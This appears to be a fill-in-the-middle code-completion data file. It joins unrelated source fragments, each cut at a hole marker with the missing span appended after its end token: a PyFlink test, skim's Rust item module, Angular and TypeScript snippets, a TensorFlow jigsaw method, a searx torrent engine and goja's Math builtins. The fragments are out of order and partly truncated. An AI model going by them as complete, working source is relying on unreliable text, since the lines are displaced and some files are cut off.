# base64.b64encode(open("python-package1-0.0.0.tar.gz", "rb").read()).decode("utf-8")
f.write(base64.b64decode(
"H4sICNefrV0C/2Rpc3QvcHl0aG9uLXBhY2thZ2UxLTAuMC4wLnRhcgDtmVtv2jAYhnPtX2H1CrRCY+ckI"
"XEx7axuUA11u5imyICTRc1JiVnHfv1MKKWjYxwKEdPehws7xkmUfH5f+3PyqfqWpa1cjG5EKFnLbOvfhX"
"FQTI3nOPPSdavS5Pa8nGMwy3Esi3ke9wyTObbnGNQxamBSKlFQavzUryG8ldG6frpbEGx4yNmDLMp/hPy"
"P8b+6fNN613vdP1z8XdteG3+ug/17/F3Hcw1qIv5H54NUYiyUaH2SRRllaYeytkl6IpEdujI2yH2XapCQ"
"wSRJRDHt0OveZa//uUfeZonUvUO5bHo+0ZcoVo9bMhFRvGx9H41kWj447aUsR0WUq+pui8arWKggK5Jli"
"wGOo/95q79ovXi6/nfyf246Dof/n078fT9KI+X77Xx6BP83bX4Xf5NxT7dz7toO/L8OxjKgeTwpG+KcDp"
"sdQjWFVJMipYI+o0MCk4X/t2UYtqI0yPabCHb3f861XcD/Ty/+Y5nLdCzT0dSPo/SmbKsf6un+b7KV+Ls"
"W4/D/OoC9w/930P9eGwM75//csrD+Q/6P/P/k9D/oX3988Wqw1bS/tf6tR+s/m3EG/ddBqXO9XKf15C8p"
"P9k4HZBtBgzZaVW5vrfKcj+W32W82ygEB9D/Xu9+4/qfP9L/rBv0X1v87yONKRX61/qfzwqjIDzIPTbv/"
"7or3/88i0H/tfBFW7s/s/avRInQH06ieEy7tDrQeYHUdRN7wP+n/vf62LOH/pld7f9xz7a5Pfufedy0oP"
"86iJI8KxStAq6yLC4JWdbbVbWRikR2z1ZGytk5vauW3QdnBFE6XqwmykazCesAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAOBw/AJw5CHBAFAAAA=="))
self.t_env.set_python_requirements(requirements_txt_path, requirements_dir_path)
def add_one(i):
from python_package1 import plus
return plus(i, 1)
self.t_env.register_function("add_one",
udf(add_one, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("add_one(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["2,1", "3,2", "4,3"])
def test_add_python_archive(self):
tmp_dir = self.tempdir
archive_dir_path = os.path.join(tmp_dir, "archive_" + str(uuid.uuid4()))
os.mkdir(archive_dir_path)
with open(os.path.join(archive_dir_path, "data.txt"), 'w') as f:
f.write("2")
archive_file_path = \
shutil.make_archive(os.path.dirname(archive_dir_path), 'zip', archive_dir_path)
self.t_env.add_python_archive(archive_file_path, "data")
def add_from_file(i):
with open("data/data.txt", 'r') as f:
return i + int(f.read())
self.t_env.register_function("add_from_file",
udf(add_from_file, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("add_from_file(a), a").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["3,1", "4,2", "5,3"])
@unittest.skipIf(on_windows(), "Symbolic link is not supported on Windows, skipping.")
def test_set_environment(self):
python_exec = sys.executable
tmp_dir = self.tempdir
python_exec_link_path = os.path.join(tmp_dir, "py_exec")
os.symlink(python_exec, python_exec_link_path)
self.t_env.get_config().set_python_executable(python_exec_link_path)
def check_python_exec(i):
import os
assert os.environ["python"] == python_exec_link_path
return i
self.t_env.register_function("check_python_exec",
udf(check_python_exec, DataTypes.BIGINT(),
DataTypes.BIGINT()))
def check_pyflink_gateway_disabled(i):
try:
from pyflink.java_gateway import get_gateway
get_gateway()
except Exception as e:
assert str(e).startswith("It's launching the PythonGatewayServer during Python UDF"
" execution which is unexpected.")
else:
raise Exception("The gateway server is not disabled!")
return i
self.t_env.register_function("check_pyflink_gateway_disabled",
udf(check_pyflink_gateway_disabled, DataTypes.BIGINT(),
DataTypes.BIGINT()))
table_sink = source_sink_utils.TestAppendSink(
['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()])
self.t_env.register_table_sink("Results", table_sink)
t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b'])
t.select("check_python_exec(a), check_pyflink_gateway_disabled(a)").insert_into("Results")
self.t_env.execute("test")
actual = source_sink_utils.results()
self.assert_equals(actual, ["1,1", "2,2", "3,3"])
if __name__ == "__main__":
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports')
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)<|fim▁end|> | |
<|file_name|>item.rs<|end_file_name|><|fim▁begin|>// An item is line of text that read from `find` command or stdin together with
// the internal states, such as selected or not
use std::cmp::Ordering;
use ncurses::*;
use ansi::parse_ansi;
use regex::Regex;
use reader::FieldRange;
use std::borrow::Cow;
use std::ascii::AsciiExt;
use std::sync::Arc;
macro_rules! println_stderr(
($($arg:tt)*) => { {
let r = writeln!(&mut ::std::io::stderr(), $($arg)*);
r.expect("failed printing to stderr");
} }
);
// An item stores everything a single line of input needs in order to be processed and displayed.
//
// What's special about an item?
// The simplest version of an item is a line of text, but things get more complex:
// - The conversion of lower/upper case is slow in Rust, because it involves Unicode.
// - We may need to interpret the ANSI codes in the text.
// - The text can be transformed and limited while searching.
// As for ANSI, we assume it is linewise, meaning that no ANSI codes will affect
// more than one line.
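// For example, with ANSI enabled, an input such as "\x1b[31mred\x1b[0m" would
// (under this linewise assumption) end up with `text` holding the visible
// "red" while `ansi_states` records where the color attribute applies.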
#[derive(Debug)]
pub struct Item {
// (num of run, number of index)
index: (usize, usize),
    // The text that will be output when the user presses `enter`
output_text: String,
// The text that will shown into the screen. Can be transformed.
text: String,
// cache of the lower case version of text. To improve speed
text_lower_chars: Vec<char>,
// the ansi state (color) of the text
ansi_states: Vec<(usize, attr_t)>,
matching_ranges: Vec<(usize, usize)>,
// For the transformed ANSI case, the output will need another transform.
using_transform_fields: bool,
ansi_enabled: bool,
}
impl<'a> Item {
pub fn new(orig_text: String,
ansi_enabled: bool,
trans_fields: &[FieldRange],
matching_fields: &[FieldRange],
delimiter: &Regex,
index: (usize, usize)) -> Self {
let using_transform_fields = trans_fields.len() > 0;
// transformed | ANSI | output<|fim▁hole|> // | |
// +- T -> trans +- F -> trans | orig
// orig | |
// +- F -> orig +- T -> ANSI ==| ANSI
// | |
// +- F -> orig | orig
let (text, states_text) = if using_transform_fields && ansi_enabled {
// ansi and transform
parse_ansi(&parse_transform_fields(delimiter, &orig_text, trans_fields))
} else if using_transform_fields {
// transformed, not ansi
(parse_transform_fields(delimiter, &orig_text, trans_fields), Vec::new())
} else if ansi_enabled {
// not transformed, ansi
parse_ansi(&orig_text)
} else {
// normal case
("".to_string(), Vec::new())
};
let mut ret = Item {
index: index,
output_text: orig_text,
text: text,
text_lower_chars: Vec::new(),
ansi_states: states_text,
using_transform_fields: trans_fields.len() > 0,
matching_ranges: Vec::new(),
ansi_enabled: ansi_enabled,
};
let lower_chars: Vec<char> = ret.get_text().to_ascii_lowercase().chars().collect();
let matching_ranges = if matching_fields.len() > 0 {
parse_matching_fields(delimiter, ret.get_text(), matching_fields)
} else {
vec![(0, lower_chars.len())]
};
ret.text_lower_chars = lower_chars;
ret.matching_ranges = matching_ranges;
ret
}
pub fn get_text(&self) -> &str {
if !self.using_transform_fields && !self.ansi_enabled {
&self.output_text
} else {
&self.text
}
}
pub fn get_output_text(&'a self) -> Cow<'a, str> {
if self.using_transform_fields && self.ansi_enabled {
let (text, _) = parse_ansi(&self.output_text);
Cow::Owned(text)
} else if !self.using_transform_fields && self.ansi_enabled {
Cow::Borrowed(&self.text)
} else {
Cow::Borrowed(&self.output_text)
}
}
pub fn get_lower_chars(&self) -> &[char] {
&self.text_lower_chars
}
pub fn get_ansi_states(&self) -> &Vec<(usize, attr_t)> {
&self.ansi_states
}
pub fn get_index(&self) -> usize {
self.index.1
}
pub fn get_full_index(&self) -> (usize, usize) {
self.index
}
pub fn get_matching_ranges(&self) -> &[(usize, usize)] {
&self.matching_ranges
}
}
impl Clone for Item {
fn clone(&self) -> Item {
Item {
index: self.index,
output_text: self.output_text.clone(),
text: self.text.clone(),
text_lower_chars: self.text_lower_chars.clone(),
ansi_states: self.ansi_states.clone(),
using_transform_fields: self.using_transform_fields,
matching_ranges: self.matching_ranges.clone(),
ansi_enabled: self.ansi_enabled,
}
}
}
fn parse_transform_fields(delimiter: &Regex, text: &str, fields: &[FieldRange]) -> String {
let mut ranges = delimiter.find_iter(text)
.map(|m| (m.start(), m.end()))
.collect::<Vec<(usize, usize)>>();
let &(_, end) = ranges.last().unwrap_or(&(0, 0));
ranges.push((end, text.len()));
let mut ret = String::new();
for field in fields {
if let Some((start, stop)) = parse_field_range(field, ranges.len()) {
let &(begin, _) = ranges.get(start).unwrap();
let &(end, _) = ranges.get(stop).unwrap_or(&(text.len(), 0));
ret.push_str(&text[begin..end]);
}
}
ret
}
fn parse_matching_fields(delimiter: &Regex, text: &str, fields: &[FieldRange]) -> Vec<(usize, usize)> {
let mut ranges = delimiter.find_iter(text)
.map(|m| (m.start(), m.end()))
.collect::<Vec<(usize, usize)>>();
let &(_, end) = ranges.last().unwrap_or(&(0, 0));
ranges.push((end, text.len()));
let mut ret = Vec::new();
for field in fields {
if let Some((start, stop)) = parse_field_range(field, ranges.len()) {
let &(begin, _) = ranges.get(start).unwrap();
let &(end, _) = ranges.get(stop).unwrap_or(&(text.len(), 0));
let first = (&text[..begin]).chars().count();
let last = first + (&text[begin..end]).chars().count();
ret.push((first, last));
}
}
ret
}
fn parse_field_range(range: &FieldRange, length: usize) -> Option<(usize, usize)> {
let length = length as i64;
match *range {
FieldRange::Single(index) => {
let index = if index >= 0 {index} else {length + index};
if index < 0 || index >= length {
None
} else {
Some((index as usize, (index + 1) as usize))
}
}
FieldRange::LeftInf(right) => {
let right = if right >= 0 {right} else {length + right};
if right <= 0 {
None
} else {
Some((0, if right > length {length as usize} else {right as usize}))
}
}
FieldRange::RightInf(left) => {
let left = if left >= 0 {left} else {length as i64 + left};
if left >= length {
None
} else {
Some((if left < 0 {0} else {left} as usize, length as usize))
}
}
FieldRange::Both(left, right) => {
let left = if left >= 0 {left} else {length + left};
let right = if right >= 0 {right} else {length + right};
if left >= right || left >= length || right < 0 {
None
} else {
Some((if left < 0 {0} else {left as usize},
if right > length {length as usize} else {right as usize}))
}
}
}
}
// A bunch of items
pub type ItemGroup = Vec<Arc<Item>>;
pub type MatchedItemGroup = Vec<MatchedItem>;
pub type Rank = [i64; 4]; // score, index, start, end
#[derive(PartialEq, Eq, Clone, Debug)]
#[allow(dead_code)]
pub enum MatchedRange {
Range(usize, usize),
Chars(Vec<usize>),
}
#[derive(Clone, Debug)]
pub struct MatchedItem {
pub item: Arc<Item>,
pub rank: Rank,
    pub matched_range: Option<MatchedRange>, // range of chars that matched the pattern
}
impl MatchedItem {
pub fn builder(item: Arc<Item>) -> Self {
MatchedItem {
item: item,
rank: [0, 0, 0, 0],
matched_range: None,
}
}
pub fn matched_range(mut self, range: MatchedRange) -> Self{
self.matched_range = Some(range);
self
}
pub fn rank(mut self, rank: Rank) -> Self {
self.rank = rank;
self
}
pub fn build(self) -> Self {
self
}
}
impl Ord for MatchedItem {
fn cmp(&self, other: &MatchedItem) -> Ordering {
self.rank.cmp(&other.rank)
}
}
// `PartialOrd` needs to be implemented as well.
impl PartialOrd for MatchedItem {
fn partial_cmp(&self, other: &MatchedItem) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl PartialEq for MatchedItem {
fn eq(&self, other: &MatchedItem) -> bool {
self.rank == other.rank
}
}
impl Eq for MatchedItem {}
#[cfg(test)]
mod test {
use reader::FieldRange::*;
use regex::Regex;
#[test]
fn test_parse_field_range() {
assert_eq!(super::parse_field_range(&Single(0), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&Single(9), 10), Some((9,10)));
assert_eq!(super::parse_field_range(&Single(10), 10), None);
assert_eq!(super::parse_field_range(&Single(-1), 10), Some((9,10)));
assert_eq!(super::parse_field_range(&Single(-10), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&Single(-11), 10), None);
assert_eq!(super::parse_field_range(&LeftInf(0), 10), None);
assert_eq!(super::parse_field_range(&LeftInf(1), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&LeftInf(8), 10), Some((0,8)));
assert_eq!(super::parse_field_range(&LeftInf(10), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&LeftInf(11), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&LeftInf(-1), 10), Some((0,9)));
assert_eq!(super::parse_field_range(&LeftInf(-8), 10), Some((0,2)));
assert_eq!(super::parse_field_range(&LeftInf(-9), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&LeftInf(-10), 10), None);
assert_eq!(super::parse_field_range(&LeftInf(-11), 10), None);
assert_eq!(super::parse_field_range(&RightInf(0), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&RightInf(1), 10), Some((1,10)));
assert_eq!(super::parse_field_range(&RightInf(8), 10), Some((8,10)));
assert_eq!(super::parse_field_range(&RightInf(10), 10), None);
assert_eq!(super::parse_field_range(&RightInf(11), 10), None);
assert_eq!(super::parse_field_range(&RightInf(-1), 10), Some((9,10)));
assert_eq!(super::parse_field_range(&RightInf(-8), 10), Some((2,10)));
assert_eq!(super::parse_field_range(&RightInf(-9), 10), Some((1,10)));
assert_eq!(super::parse_field_range(&RightInf(-10), 10), Some((0, 10)));
assert_eq!(super::parse_field_range(&RightInf(-11), 10), Some((0, 10)));
assert_eq!(super::parse_field_range(&Both(0,0), 10), None);
assert_eq!(super::parse_field_range(&Both(0,1), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&Both(0,10), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&Both(0,11), 10), Some((0, 10)));
assert_eq!(super::parse_field_range(&Both(1,-1), 10), Some((1, 9)));
assert_eq!(super::parse_field_range(&Both(1,-9), 10), None);
assert_eq!(super::parse_field_range(&Both(1,-10), 10), None);
assert_eq!(super::parse_field_range(&Both(-9,-9), 10), None);
assert_eq!(super::parse_field_range(&Both(-9,-8), 10), Some((1, 2)));
assert_eq!(super::parse_field_range(&Both(-9, 0), 10), None);
assert_eq!(super::parse_field_range(&Both(-9, 1), 10), None);
assert_eq!(super::parse_field_range(&Both(-9, 2), 10), Some((1,2)));
assert_eq!(super::parse_field_range(&Both(-1,0), 10), None);
assert_eq!(super::parse_field_range(&Both(11,20), 10), None);
assert_eq!(super::parse_field_range(&Both(-10,-10), 10), None);
}
#[test]
fn test_parse_transform_fields() {
// delimiter is ","
let re = Regex::new(".*?,").unwrap();
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![Single(1),
Single(3),
Single(-1),
Single(-7)]),
"B,D,F");
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![LeftInf(3),
LeftInf(-5),
LeftInf(-6)]),
"A,B,C,A,");
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![RightInf(4),
RightInf(-2),
RightInf(-1),
RightInf(7)]),
"E,FE,FF");
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![Both(2,3),
Both(-9,2),
Both(5,10),
Both(-9,-4)]),
"C,A,B,FA,B,");
}
#[test]
fn test_parse_matching_fields() {
// delimiter is ","
let re = Regex::new(".*?,").unwrap();
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![Single(1),
Single(3),
Single(-1),
Single(-7)]),
vec![(2,4), (6,8), (10,11)]);
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![LeftInf(3),
LeftInf(-5),
LeftInf(-6)]),
vec![(0, 6), (0, 2)]);
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![RightInf(4),
RightInf(-2),
RightInf(-1),
RightInf(7)]),
vec![(8, 11), (8, 11), (10, 11)]);
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![Both(2,3),
Both(-9,2),
Both(5,10),
Both(-9,-4)]),
vec![(4, 6), (0, 4), (10,11), (0, 4)]);
}
}<|fim▁end|> | //------------------------------------------------------
// +- T -> trans+ANSI | ANSI |
<|file_name|>mdc-slider-e2e-module.ts<|end_file_name|><|fim▁begin|>/**
* @license
* Copyright Google LLC All Rights Reserved.
*<|fim▁hole|>
import {NgModule} from '@angular/core';
import {MatSliderModule} from '@angular/material-experimental/mdc-slider';
import {MdcSliderE2e} from './mdc-slider-e2e';
@NgModule({
imports: [MatSliderModule],
declarations: [MdcSliderE2e],
})
export class MdcSliderE2eModule {}<|fim▁end|> | * Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/ |
<|file_name|>filterList.ts<|end_file_name|><|fim▁begin|>import { Pipe } from '@angular/core';
import { Config } from './config';
@Pipe({
name: 'filterList'
})
export class FilterList {
transform(items: any[], args: any): any[] {
if (items.length === 0 || args.length < Config.minFilterInput) return items;
return items.filter(item => {
return Object.keys(item).some(k => {<|fim▁hole|> });
}
}<|fim▁end|> | return Config.filterTypes.indexOf(k) > -1 ? new RegExp(args, 'i').test(item[k]) : false;
}); |
<|file_name|>jigsaw.py<|end_file_name|><|fim▁begin|>from __future__ import division, print_function, absolute_import
import selfsup
import tensorflow as tf
import os
from .base import Method
from collections import OrderedDict
import deepdish as dd
import numpy as np
import itertools
import selfsup.jigsaw
PERMUTATIONS = selfsup.jigsaw.load_permutations(selfsup.res('jigsaw/permutations_100_max.bin'))
def _make_random_patches(x, y, patch_size, permutations, size=3):
batch_size = x.get_shape().as_list()[0]
crop_size = x.get_shape().as_list()[1]
perm_idx = tf.expand_dims(y, 1)
perm = tf.gather_nd(permutations, perm_idx)
WINDOW_SIZE = crop_size // size
N = x.get_shape().as_list()[0]
C = x.get_shape().as_list()[3]
patches = []
for i, j in dd.multi_range(size, size):
M = WINDOW_SIZE - patch_size + 1
assert M > 0, f'Jigsaw: Window size ({WINDOW_SIZE}) and patch size ({patch_size}) not compatible'
limit = np.array([1, M, M, 1])
offset = np.array([0, i * WINDOW_SIZE, j * WINDOW_SIZE, 0]) + tf.random_uniform(
[4], dtype=tf.int32,
maxval=M,
) % limit
patch = tf.slice(x, offset, [N, patch_size, patch_size, C])
patches.append(patch)
patches1 = tf.stack(patches, axis=1)
xyz = np.arange(batch_size)[:, np.newaxis] * size**2 + (perm - 1)
perm0 = tf.reshape(xyz, [-1])
patches_flat = tf.reshape(patches1, [-1] + patches1.get_shape().as_list()[2:])
patches2 = tf.gather(patches_flat, perm0)
return patches2
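# Worked example of the window arithmetic above (values assumed purely for
# illustration): with crop_size=225, size=3 and patch_size=75, WINDOW_SIZE is
# 225 // 3 = 75 and M = 75 - 75 + 1 = 1, so every patch is pinned to its grid
# cell; with patch_size=64 instead, M = 12 and each patch jitters within its cell.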
class Jigsaw(Method):
def __init__(self, name, basenet, loader, patch_size=75, size=3,
reduce_channels=128, use_scalers=False):
self.name = name
self.basenet = basenet
self._size = size
self._patch_size = patch_size
self._loader = loader
self._reduce_channels = reduce_channels
if size == 3:
self._permutations = PERMUTATIONS
elif size == 2:
# They are 1-based due to the permutations file
self._permutations = 1 + np.array(list(itertools.permutations(range(size**2))))
self._use_scalers = use_scalers
@property
def basenet_settings(self):
return {'convolutional': False}
def batch(self):
x, _ = self._loader.batch()
y = tf.random_uniform([self._loader.batch_size], dtype=tf.int32, maxval=len(self._permutations))
patches = _make_random_patches(x, y, self._patch_size, self._permutations, size=self._size)
pad_both = self.basenet.canonical_input_size - self._patch_size
pad_lo = pad_both // 2
pad_up = pad_both - pad_lo
#paddings = [[0, 0], [pad_lo, pad_up], [pad_lo, pad_up], [0, 0]]
#pad_patches = tf.pad(patches, paddings=paddings, mode='REFLECT')
pad_patches = patches
self._y = y
extra = {'permutation': y}
return pad_patches, extra
def build_network(self, network, extra, phase_test, global_step):
info = selfsup.info.create(scale_summary=True)
if self._size == 3:
z = network['activations']['pool5']
else:
z = network['activations']['top']
#z = tf.squeeze(z, [1, 2])
z = tf.reshape(z, (z.get_shape().as_list()[0], -1))
if self._use_scalers:
z = selfsup.ops.scale(z, name='scale')
#W_init = tf.contrib.layers.variance_scaling_initializer()
W_init = tf.random_normal_initializer(0.0, 0.0001)
b_init = tf.constant_initializer(0.0)
reduce_ch = self._reduce_channels
with tf.variable_scope('reduction'):
c_o = reduce_ch
reduce_W = tf.get_variable('weights', [z.get_shape().as_list()[1], c_o], dtype=tf.float32,
initializer=W_init)
reduce_b = tf.get_variable('biases', [c_o], dtype=tf.float32,
initializer=b_init)
z = tf.nn.xw_plus_b(z, reduce_W, reduce_b)
z = tf.nn.relu(z)
z = tf.reshape(z, [self._loader.batch_size, -1, z.get_shape().as_list()[-1]])
z = tf.concat(tf.unstack(z, axis=1), 1)
with tf.variable_scope('jigsaw'):
c_o = len(self._permutations)
jigsaw_W = tf.get_variable('weights', [z.get_shape().as_list()[1], c_o], dtype=tf.float32,
initializer=W_init)
jigsaw_b = tf.get_variable('biases', [c_o], dtype=tf.float32,
initializer=b_init)
z = tf.nn.xw_plus_b(z, jigsaw_W, jigsaw_b)
with tf.variable_scope('primary_loss'):
loss_each = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self._y, logits=z)
primary_loss = tf.reduce_mean(loss_each)
with tf.name_scope('weight_decay'):
wd = 1e-6
l2_loss = tf.nn.l2_loss(reduce_W) + tf.nn.l2_loss(jigsaw_W)
weight_decay = wd * l2_loss
with tf.name_scope('loss'):
loss = weight_decay + primary_loss
variables = info['vars']
self.losses = OrderedDict([
('main', primary_loss),
('+weight_decay', weight_decay),
])
self.primary_loss = primary_loss
self.loss = loss
self.feedback_variables = []
<|fim▁hole|> info['activations']['loss'] = loss
info['activations']['weight_decay'] = weight_decay
return info
def feedback(self, variables, iteration):
pass<|fim▁end|> | info['activations']['primary_loss'] = primary_loss |
<|file_name|>kickass.py<|end_file_name|><|fim▁begin|>"""
Kickass Torrent (Videos, Music, Files)
@website https://kickass.so
@provide-api no (nothing found)
@using-api no
@results HTML (using search portal)
@stable yes (HTML can change)
@parse url, title, content, seed, leech, magnetlink
"""
from urlparse import urljoin
from cgi import escape
from urllib import quote
from lxml import html
from operator import itemgetter
from searx.engines.xpath import extract_text
# engine dependent config
categories = ['videos', 'music', 'files']
paging = True
# search-url
url = 'https://kickass.to/'
search_url = url + 'search/{search_term}/{pageno}/'
# specific xpath variables
magnet_xpath = './/a[@title="Torrent magnet link"]'
torrent_xpath = './/a[@title="Download torrent file"]'
content_xpath = './/span[@class="font11px lightgrey block"]'
# do search-request
def request(query, params):
params['url'] = search_url.format(search_term=quote(query),
pageno=params['pageno'])
return params
# get response from search-request
def response(resp):
results = []
dom = html.fromstring(resp.text)<|fim▁hole|> # return empty array if nothing is found
if not search_res:
return []
# parse results
for result in search_res[1:]:
link = result.xpath('.//a[@class="cellMainLink"]')[0]
href = urljoin(url, link.attrib['href'])
title = extract_text(link)
content = escape(extract_text(result.xpath(content_xpath)))
seed = result.xpath('.//td[contains(@class, "green")]/text()')[0]
leech = result.xpath('.//td[contains(@class, "red")]/text()')[0]
filesize = result.xpath('.//td[contains(@class, "nobr")]/text()')[0]
filesize_multiplier = result.xpath('.//td[contains(@class, "nobr")]//span/text()')[0]
files = result.xpath('.//td[contains(@class, "center")][2]/text()')[0]
# convert seed to int if possible
if seed.isdigit():
seed = int(seed)
else:
seed = 0
# convert leech to int if possible
if leech.isdigit():
leech = int(leech)
else:
leech = 0
# convert filesize to byte if possible
try:
filesize = float(filesize)
# convert filesize to byte
if filesize_multiplier == 'TB':
filesize = int(filesize * 1024 * 1024 * 1024 * 1024)
elif filesize_multiplier == 'GB':
filesize = int(filesize * 1024 * 1024 * 1024)
elif filesize_multiplier == 'MB':
filesize = int(filesize * 1024 * 1024)
elif filesize_multiplier == 'KB':
filesize = int(filesize * 1024)
        except ValueError:
filesize = None
# convert files to int if possible
if files.isdigit():
files = int(files)
else:
files = None
magnetlink = result.xpath(magnet_xpath)[0].attrib['href']
torrentfile = result.xpath(torrent_xpath)[0].attrib['href']
torrentfileurl = quote(torrentfile, safe="%/:=&?~#+!$,;'@()*")
# append result
results.append({'url': href,
'title': title,
'content': content,
'seed': seed,
'leech': leech,
'filesize': filesize,
'files': files,
'magnetlink': magnetlink,
'torrentfile': torrentfileurl,
'template': 'torrent.html'})
# return results sorted by seeder
return sorted(results, key=itemgetter('seed'), reverse=True)<|fim▁end|> |
search_res = dom.xpath('//table[@class="data"]//tr')
|
<|file_name|>builtin_math.go<|end_file_name|><|fim▁begin|>package goja
import (
"math"
)
func (r *Runtime) math_abs(call FunctionCall) Value {
return floatToValue(math.Abs(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_acos(call FunctionCall) Value {
return floatToValue(math.Acos(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_asin(call FunctionCall) Value {
return floatToValue(math.Asin(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_atan(call FunctionCall) Value {
return floatToValue(math.Atan(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_atan2(call FunctionCall) Value {
y := call.Argument(0).ToFloat()
x := call.Argument(1).ToFloat()
return floatToValue(math.Atan2(y, x))
}
func (r *Runtime) math_ceil(call FunctionCall) Value {
return floatToValue(math.Ceil(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_cos(call FunctionCall) Value {
return floatToValue(math.Cos(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_exp(call FunctionCall) Value {
return floatToValue(math.Exp(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_floor(call FunctionCall) Value {
return floatToValue(math.Floor(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_log(call FunctionCall) Value {
return floatToValue(math.Log(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_max(call FunctionCall) Value {
if len(call.Arguments) == 0 {
return _negativeInf
}
result := call.Arguments[0].ToFloat()
if math.IsNaN(result) {
return _NaN
}
for _, arg := range call.Arguments[1:] {
f := arg.ToFloat()
if math.IsNaN(f) {
return _NaN
}
result = math.Max(result, f)
}
return floatToValue(result)
}
func (r *Runtime) math_min(call FunctionCall) Value {
if len(call.Arguments) == 0 {
return _positiveInf
}
result := call.Arguments[0].ToFloat()
if math.IsNaN(result) {
return _NaN
}
for _, arg := range call.Arguments[1:] {
f := arg.ToFloat()
if math.IsNaN(f) {
return _NaN
}
result = math.Min(result, f)
}
return floatToValue(result)
}
func (r *Runtime) math_pow(call FunctionCall) Value {
x := call.Argument(0)
y := call.Argument(1)
if x, ok := x.assertInt(); ok {
if y, ok := y.assertInt(); ok && y >= 0 && y < 64 {
if y == 0 {
return intToValue(1)
}
if x == 0 {
return intToValue(0)
}
ip := ipow(x, y)
if ip != 0 {
return intToValue(ip)
}
}
}
return floatToValue(math.Pow(x.ToFloat(), y.ToFloat()))
}
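// Note on math_pow: a zero result from ipow is treated as "no exact integer
// result" (e.g. on overflow), so the computation falls back to math.Pow.
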
func (r *Runtime) math_random(call FunctionCall) Value {
return floatToValue(r.rand())
}
func (r *Runtime) math_round(call FunctionCall) Value {
f := call.Argument(0).ToFloat()
if math.IsNaN(f) {
return _NaN
}
if f == 0 && math.Signbit(f) {
return _negativeZero
}
t := math.Trunc(f)
if f >= 0 {
if f-t >= 0.5 {
return floatToValue(t + 1)
}
} else {
if t-f > 0.5 {
return floatToValue(t - 1)
}
}
return floatToValue(t)
}
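// Ties round toward +Inf, matching ECMAScript Math.round semantics:
// Math.round(2.5) === 3 while Math.round(-2.5) === -2.
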
func (r *Runtime) math_sin(call FunctionCall) Value {
return floatToValue(math.Sin(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_sqrt(call FunctionCall) Value {
return floatToValue(math.Sqrt(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_tan(call FunctionCall) Value {
return floatToValue(math.Tan(call.Argument(0).ToFloat()))
}
func (r *Runtime) createMath(val *Object) objectImpl {
m := &baseObject{
class: "Math",
val: val,
extensible: true,
prototype: r.global.ObjectPrototype,
}
m.init()
m._putProp("E", valueFloat(math.E), false, false, false)
m._putProp("LN10", valueFloat(math.Ln10), false, false, false)<|fim▁hole|> m._putProp("LOG2E", valueFloat(math.Log2E), false, false, false)
m._putProp("LOG10E", valueFloat(math.Log10E), false, false, false)
m._putProp("PI", valueFloat(math.Pi), false, false, false)
m._putProp("SQRT1_2", valueFloat(sqrt1_2), false, false, false)
m._putProp("SQRT2", valueFloat(math.Sqrt2), false, false, false)
m._putProp("abs", r.newNativeFunc(r.math_abs, nil, "abs", nil, 1), true, false, true)
m._putProp("acos", r.newNativeFunc(r.math_acos, nil, "acos", nil, 1), true, false, true)
m._putProp("asin", r.newNativeFunc(r.math_asin, nil, "asin", nil, 1), true, false, true)
m._putProp("atan", r.newNativeFunc(r.math_atan, nil, "atan", nil, 1), true, false, true)
m._putProp("atan2", r.newNativeFunc(r.math_atan2, nil, "atan2", nil, 2), true, false, true)
m._putProp("ceil", r.newNativeFunc(r.math_ceil, nil, "ceil", nil, 1), true, false, true)
m._putProp("cos", r.newNativeFunc(r.math_cos, nil, "cos", nil, 1), true, false, true)
m._putProp("exp", r.newNativeFunc(r.math_exp, nil, "exp", nil, 1), true, false, true)
